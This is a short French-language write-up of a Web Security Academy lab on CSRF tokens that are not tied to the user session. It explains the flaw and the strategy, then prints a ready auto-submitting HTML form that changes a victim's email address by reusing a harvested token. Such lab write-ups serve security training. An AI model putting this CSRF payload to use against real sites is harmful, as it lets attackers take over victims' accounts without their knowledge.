CSRF avec jeton non lié à la session

CSRF where token is not tied to user session

Lab: CSRF where token is not tied to user session | Web Security AcademyWebSecAcademy

Objectif du labo

Changer l’adresse e-mail de la victime via une attaque CSRF. L’application utilise des jetons CSRF, mais ceux-ci ne sont pas liés à la session utilisateur.

Constatations

Chaque jeton CSRF n’est valable qu’une seule fois.

Les jetons ne sont pas associés à la session : un jeton obtenu avec l’utilisateur A peut être utilisé pour cibler B.

Stratégie d’exploitation

Récupérer un jeton CSRF neuf sans l’utiliser (intercepter une nouvelle requête pour obtenir un jeton encore valide).
Héberger un formulaire piégé sur le serveur d’exploit qui envoie une requête POST de changement d’e-mail en réutilisant ce jeton.
Quand la victime visite la page piégée, le formulaire s’envoie automatiquement et modifie son e-mail.

<form class="login-form" name="change-email-form" action="https://0abb002803dad06d8096038d003a0088.web-security-academy.net/my-account/change-email" method="POST">
          <input required="" type="email" name="email" value="[email protected]">
           <input required="" type="hidden" name="csrf" value="LMds3vzdHoalpvvZ6EHmKpg2M00olc4A">
  </form>

<script>
   document.forms[0].submit();
</script>

Mis à jour il y a 4 mois

hashtagCSRF where token is not tied to user session

hashtagObjectif du labo

hashtagConstatations

hashtagStratégie d’exploitation

CSRF where token is not tied to user session

Objectif du labo

Constatations

Stratégie d’exploitation